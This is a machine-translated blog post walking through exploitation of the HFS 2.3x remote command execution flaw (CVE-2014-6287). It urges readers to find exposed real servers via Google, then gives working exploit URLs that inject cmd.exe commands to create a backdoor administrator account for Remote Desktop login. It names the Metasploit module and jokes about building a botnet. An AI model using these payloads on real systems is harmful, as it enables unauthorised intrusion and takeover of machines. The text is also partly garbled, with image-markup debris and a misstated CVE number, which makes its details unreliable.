Review HFS 2.3x remote command execution, catch chicken hack "Doomsday" (cve2014-6287)

Last year HFS 2.3x remote command execution let a lot of people suffer, especially some hackers, because many of the bulk of chicken-breeding hackers love to use it, so, hard to catch the broiler to share with people. We analyzed the vulnerability and learned that the problem of regular expressions led to the execution of remote code.

Let's test the power of this vulnerability locally, why did you mention it over the next six months? Because today casually search, with this version of the domestic there are many, involving some "catch the Chicken Hack" (now still in this version of the estimate is a side dish), schools and so on. Interestingly, the server with HFS is generally turned on 3389, evil ah. Such as.

More hosts can be found on Google.

650) this.width=650; "title=" hfs01.jpg "style=" Float:none "alt=" wkiom1t3byxjnfdtaake7zoadsc024.jpg "src=" http:/ S3.51cto.com/wyfs02/m02/5a/20/wkiom1t3byxjnfdtaake7zoadsc024.jpg "/>

Test a few, most of the 3389 ports open. Causes the server to be very insecure.

650) this.width=650; "title=" hfs02.jpg "style=" Float:none "alt=" wkiol1t3bpudt0whaaf2anh6-fe569.jpg "src=" http:/ S3.51cto.com/wyfs02/m00/5a/1c/wkiol1t3bpudt0whaaf2anh6-fe569.jpg "/>

Below we test on the local virtual machine to simulate a "catch a chicken Hacker" host. Visit the destination URL, found there is a muma.exe, usually used to hang the net horse. The example is adapted from a real case.

650) this.width=650; "title=" hfs03.jpg "alt=" wkiom1t3bpprz3jlaahag0d4w3q598.jpg "src=" http://s3.51cto.com/wyfs02/ M01/5a/20/wkiom1t3bpprz3jlaahag0d4w3q598.jpg "/>

You can then use the following exp to add an administrator account to the target host and then log on remotely.

http://192.168.72.144:8080/?search==%00{.exec|cmd.exe/c net user zerosecurity 12345/add.}

HTTP://192.168.72.144:8080/?SEARCH==%00{.EXEC|CMD.EXE/C net localgroup administrators Zerosecurity/add.}

TIP: Some versions of search are not in front of you, try the search box yourself when using.

After logging into Remote Desktop, you can see that the administrator account was successfully added.

650) this.width=650; "title=" hfs04.jpg "alt=" wkiol1t3cz6acnr5aahh1f4t1hm581.jpg "src=" http://s3.51cto.com/wyfs02/ M01/5a/1d/wkiol1t3cz6acnr5aahh1f4t1hm581.jpg "/>

At the same time we can see that the "hacker" of the broiler also fell into our hands.

650) this.width=650; "title=" hfs05.jpg "alt=" wkiom1t3cwlrs0ceaaq50lxgr5q872.jpg "src=" http://s3.51cto.com/wyfs02/ M01/5a/20/wkiom1t3cwlrs0ceaaq50lxgr5q872.jpg "/>

Metasploit also has the corresponding exp module, here do not elaborate, interested friends can try it yourself.

Using modules: exploit/windows/http/rejetto_hfs_exec
Impact Version: HFS 2.37
cve:cve-2014-62876
Trigger platform: Windows

Exp Download: Dot Me dot Me

What the? You want to build your own chicken farm, too? I'll talk about it later.

This article is from the "Nocturnal Person" blog, so be sure to keep this source http://zerosecurity.blog.51cto.com/9913090/1617417

Review HFS 2.3x remote command execution, catch chicken hack "Doomsday" (cve2014-6287)